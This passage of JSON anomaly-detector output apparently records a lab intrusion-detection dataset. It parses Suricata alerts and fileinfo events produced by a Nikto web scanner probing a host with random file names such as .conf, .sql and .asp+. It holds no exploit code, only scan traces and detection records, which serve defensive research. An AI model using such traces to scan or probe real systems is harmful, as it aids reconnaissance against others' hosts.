(Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.java\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", 
"PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.236933 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46850 -> 192.168.10.154:80", "/parser/model/time": 1583349514.236933, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46850, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.236933 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46850 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ 
"/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.conf", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.237117+0000\",\"flow_id\":656541569686162,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46850,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.conf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.conf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.237117, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":656541569686162,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46850,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.conf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.conf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": 
"\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46850,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.conf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.conf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.conf\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.conf\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.conf", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": 
"mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.conf", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46850,\"proto\":\"TCP\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46850, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":656541569686162,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 656541569686162, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.237117+0000\",\"flow_id\":656541569686162,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46850,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.conf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.conf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, 
"AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.239413 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46852 -> 192.168.10.154:80", "/parser/model/time": 1583349514.239413, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46852, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.239413 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46852 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value 
combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.sql", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.239713+0000\",\"flow_id\":499362946523941,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46852,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sql\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sql\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.239713, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":499362946523941,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46852,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sql\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sql\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": 
"fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46852,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sql\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sql\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.sql\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.sql\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.sql", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", 
"/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.sql", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46852,\"proto\":\"TCP\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46852, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":499362946523941,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 499362946523941, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.239713+0000\",\"flow_id\":499362946523941,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46852,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sql\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sql\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, 
"AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.241805 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46854 -> 192.168.10.154:80", "/parser/model/time": 1583349514.241805, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46854, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.241805 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46854 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value 
combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.asp+", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.242016+0000\",\"flow_id\":2006664539188459,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46854,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.asp+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.asp+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.242016, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2006664539188459,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46854,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.asp+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.asp+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": 
"fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46854,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.asp+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.asp+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.asp+\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.asp+\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.asp+", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", 
"/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.asp+", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": 
